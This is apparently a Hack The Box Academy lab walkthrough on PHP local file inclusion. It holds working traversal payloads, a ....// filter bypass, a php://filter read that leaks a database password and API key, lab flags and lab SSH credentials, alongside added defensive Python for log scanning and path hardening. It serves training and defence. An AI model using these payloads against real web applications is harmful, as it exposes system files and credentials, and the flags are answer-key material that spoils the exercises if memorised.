FILE INCLUSION

LFI

Using the file inclusion, find the name of a user on the system that starts with "b".
root@oco:~$ BROWSER > {targetSite:port}
 Language: {english | spanish}
 
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=es.php

#try to discover whether an LFI vulnerability exists
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=/etc/passwd
 * if method 1 doesn't work, apply method 2

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=../../../../etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
 mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
 systemd-timesync:x:102:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
 systemd-network:x:103:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
 systemd-resolve:x:104:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
 messagebus:x:105:107::/nonexistent:/usr/sbin/nologin
 sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
 barry:x:1000:1000::/home/barry:/bin/sh
 
 * if method 2 doesn't work, apply method 3

Submit the contents of the flag.txt file located in the /usr/share/flags directory.
root@oco:~$ BROWSER > {targetSite:port}
 Language: {english | spanish}
 
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=es.php

#try to discover whether an LFI vulnerability exists
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=/etc/passwd
 * if method 1 doesn't work, apply method 2

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=../../../../../usr/share/flags/flag.txt
 HTB{n3v3r_tru$t_u$3r_!nput} 
 
 * if method 2 doesn't work, apply method 3

BASIC BYPASSES

The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt
root@oco:~$ BROWSER > {targetSite:port}
 Language: {english | spanish}
 
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/es.php

#try to discover whether an LFI vulnerability exists
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/etc/passwd
 * this is method 1 discovery
 
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/../../../../etc/passwd
 * this is method 2 discovery
 
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/../../../../etc/passwd
 * method 3 discovery using the prepended /
 
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/....//....//....//....//etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
 news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
 uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
 proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
 www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
 irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
 _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
 mysql:x:101:102:MySQL Server,,,:/nonexistent:/bin/false
 systemd-timesync:x:102:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
 systemd-network:x:103:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
 systemd-resolve:x:104:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
 messagebus:x:105:107::/nonexistent:/usr/sbin/nologin
 sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
 
 * this technique combines the approved path (languages/) with the non-recursive filter bypass (....//): a single-pass strip of ../ turns each ....// back into ../
    - the approved path combined with URL-encoded characters would also have worked
    
root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/....//....//....//....//flag.txt
 * HTB{64$!c_f!lt3r$_w0nt_$t0p_lf!}
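
As a defender-side addition (mine, not part of the original notes), the following Python scanner runs over constructed Apache access-log lines that carry the same payload shapes used above (plain traversal, the ....// form, URL-encoded dots and a php://filter wrapper) and flags each parameter value only after percent-decoding it; the log lines, the tag names and the regexes are constructed for this example.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample lines in Apache combined-log format (not from the page's lab target).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 2652 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=../../../../etc/passwd HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?language=languages/....//....//....//....//etc/passwd HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?language=languages/%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2100 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=configure HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?language=en.php HTTP/1.1" 200 2652 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

def fully_decode(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding so %252e%252e%252f is seen as ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return indicator tags for one decoded parameter value (empty list = benign)."""
    tags = []
    if re.search(r'\.\.[\\/]', value):               # ../ or ..\ ; ....// contains ../ as well
        tags.append("traversal")
    if re.match(r'[a-z][a-z0-9+.-]*://', value):      # php://, http://, ... supplied as a path
        tags.append("wrapper_or_remote")
    if re.search(r'/etc/passwd|/var/log/', value):    # classic LFI read and log-poisoning targets
        tags.append("sensitive_file")
    return tags

def scan_log(text):
    """Return (line_no, param, decoded_value, tags) for every request carrying an indicator."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qsl already decodes one layer; fully_decode handles double-encoded payloads
        for param, raw in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
            value = fully_decode(raw)
            tags = classify(value)
            if tags:
                hits.append((n, param, value, tags))
    return hits
```

Decoding before matching is the point: a rule that looks for the literal string `../` in the raw request misses both the ....// variant and the %2e%2e%2f variant.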

PHP FILTERS

Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer
root@htb:~$ locate directory-list-2.3-small.txt
root@htb:~$ cp /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt .

#fuzz for PHP files
root@htb:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.50.242:54236/FUZZ.php -ic
 index                   [Status: 200, Size: 2652, Words: 690, Lines: 64, Duration: 73ms]
 en                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms]
 es                      [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 72ms]
 configure               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 75ms]

 * the -ic flag ignores wordlist comments

 * do not limit the scan to HTTP 200 responses. include codes such as `301`, `302` and `403`
   as well, since the source of those pages can still be read through the LFI and may
   contain valuable information

#use basic PHP filters to read PHP source code
root@htb:~$ BROWSER > http://94.237.50.242:54236/index.php?language=php://filter/read=convert.base64-encode/resource=configure
 <h2>Containers</h2> {base64-encoded string}
  
 * ALT: curl -v http://94.237.50.242:54236/index.php?language=php://filter/read=convert.base64-encode/resource=configure
    - view the page source to ensure the entire encoded string is copied, else it won't fully decode

root@htb:~$ echo -n '{base64-encoded string}' | base64 -d
 <?php

   if ($_SERVER['REQUEST_METHOD'] == 'GET' && realpath(__FILE__) == realpath($_SERVER['SCRIPT_FILENAME'])) {
     header('HTTP/1.0 403 Forbidden', TRUE, 403);
     die(header('location: /index.php'));
   }

   $config = array(
     'DB_HOST' => 'db.inlanefreight.local',
     'DB_USERNAME' => 'root',
     'DB_PASSWORD' => 'HTB{n3v3r_$t0r3_pl4!nt3xt_cr3d$}',
     'DB_DATABASE' => 'blogdb'
   );

   $API_KEY = "Awew242GDshrf46+35/k";
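
The bypass in the BASIC BYPASSES section and the php://filter read above both come down to what the include path looks like when it reaches include(). The following Python model is an added example (mine, not the lab's PHP): it reproduces the weak filter, shows why ....// survives a single-pass strip of ../, and contrasts that with an allowlist plus a containment check on the resolved path; the web root /var/www/html is an assumed value.

```python
import os

LANG_DIR = "languages"   # the "approved path" prefix the page's filter looks for

def weak_filter(lang):
    """Models the page's two filters: the approved-path check plus a single-pass '../' strip."""
    if not lang.startswith(LANG_DIR + "/"):
        return None                                  # rejected outright
    return lang.replace("../", "")                   # non-recursive: each ....// collapses to ../

def allowlisted(lang, allowed=("en", "es")):
    """Map the parameter onto a fixed set of file names; any other value is refused."""
    return f"{LANG_DIR}/{lang}.php" if lang in allowed else None

def contained(base_dir, requested):
    """Refuse stream wrappers, then resolve the path and require it to stay under base_dir."""
    if "://" in requested:
        return False
    real_base = os.path.realpath(base_dir)
    real_path = os.path.realpath(os.path.join(base_dir, requested))
    return real_path == real_base or real_path.startswith(real_base + os.sep)

def safe_include_path(lang, base_dir):
    """Hardened resolution: allowlist first, containment check on the final path second."""
    mapped = allowlisted(lang)
    if mapped is None or not contained(base_dir, mapped):
        return None
    return mapped

if __name__ == "__main__":
    base = "/var/www/html"                           # assumed web root, not taken from the page
    for payload in ("languages/../../../../etc/passwd",
                    "languages/....//....//....//....//etc/passwd"):
        after = weak_filter(payload)
        print(f"{payload!r}\n  weak filter -> {after!r}, still contained: {contained(base, after)}")
    for lang in ("es", "es.php", "../../etc/passwd"):
        print(f"{lang!r} -> {safe_include_path(lang, base)!r}")
```

Note that the containment check must run on the path the filter hands to include(), not on the raw parameter: the raw ....// string normalises to harmless directory names and only becomes traversal after the weak filter rewrites it.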

PHP WRAPPERS

Try to gain RCE using one of the PHP wrappers and read the flag at /

REMOTE FILE INCLUSION (RFI)

Attack the target, gain command execution by exploiting the RFI vulnerability, and then look for the flag under one of the directories in /

LFI AND FILE UPLOADS

Use any of the techniques covered in this section to gain RCE and read the flag at /

LOG POISONING

Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd

Try to use a different technique to gain RCE and read the flag at /

AUTOMATED SCANNING

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

FILE INCLUSION PREVENTION

SSH to 10.129.29.112 (ACADEMY-LFI-HARDEN) with user "htb-student" and password "HTB_@cademy_stdnt!". What is the full path to the php.ini file for Apache?

SSH to 10.129.29.112 (ACADEMY-LFI-HARDEN) with user "htb-student" and password "HTB_@cademy_stdnt!". Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons.
